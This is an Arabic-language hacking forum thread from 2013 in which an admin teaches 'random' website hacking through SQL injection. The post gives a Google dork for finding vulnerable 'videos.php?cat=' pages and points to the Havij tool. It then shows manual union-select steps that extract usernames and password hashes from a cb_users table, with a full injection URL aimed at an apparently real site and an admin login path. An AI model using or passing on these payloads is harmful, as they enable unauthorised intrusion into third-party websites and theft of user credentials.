Gene Hacker Egypt

 
الرئيسيةاليوميةس .و .جبحـثشات الهكر المصرى الأعضاءالمجموعاتالتسجيلدخول

شاطر | 
 

 الاختراق العشواءي دورك ثغرة SQL

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
MoRa Hacker
Admin
avatar

عدد المساهمات : 26
تاريخ التسجيل : 21/03/2013

مُساهمةموضوع: الاختراق العشواءي دورك ثغرة SQL   الأحد يونيو 30, 2013 6:45 pm




بسم الله الرحمن الرحيم

 
ثغرة SQL

ضع هذا الرمز فى جوجل


او ضع الرمز فى هذا الموقع للبحث عن المواقع الصابه بالثغره
http://isoftwarez.com/scanner/scanner/

غير Google الى Bing
وضع علامة على Depth scan ( slow but sure )
ثــم اضغط على  Search


الكود:
inurl:"videos.php?cat="
الاستغلال تقدر تستخدم برنامج havij
أو

عن طريق الاستغلال اليدوي

تضيف اخر الرابط لما تطلع عدد العواميد




الكود:
+from+cb_user
وبدال العامود المصاب


الكود:
usern ame
شيل المسافة الموجودة في كلمة na me

ولما تاخذ اليوزر جاء وقت كلمة المرور

ضيف بدال العامود المصاب



الكود:
password
المشكلة يطلع الباسورد في صورة هاش يصعب فكه

الي يلقى طريقة لفكه لا يبخل علينا في وضعها

مثال

lhttp://alfatimi.tv/videos.php?cat=-1238+union+select+1,2,user****,4,5,6,7,8,9+from+cb_users--

مسار لوحة التحكم

http://localhost/admin_area/login.php

وفي الاخير كلمة شكر تكفي

مـــع تحياتى: MoRa Hacker
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://genehackeregypt.com
xFoxHacker

avatar

عدد المساهمات : 4
تاريخ التسجيل : 06/01/2014

مُساهمةموضوع: رد: الاختراق العشواءي دورك ثغرة SQL   الإثنين يناير 06, 2014 10:56 am

السلام عليكم اخوي دخلت الموقع وحطيت الرمز يقولني *** finish ( no more search results from google )

 scratch 
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
كاتب هذه المساهمة مطرود حالياً من المنتدى - معاينة المساهمة
 
الاختراق العشواءي دورك ثغرة SQL
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
Gene Hacker Egypt :: دورة اختراق المواقع 2013-
انتقل الى: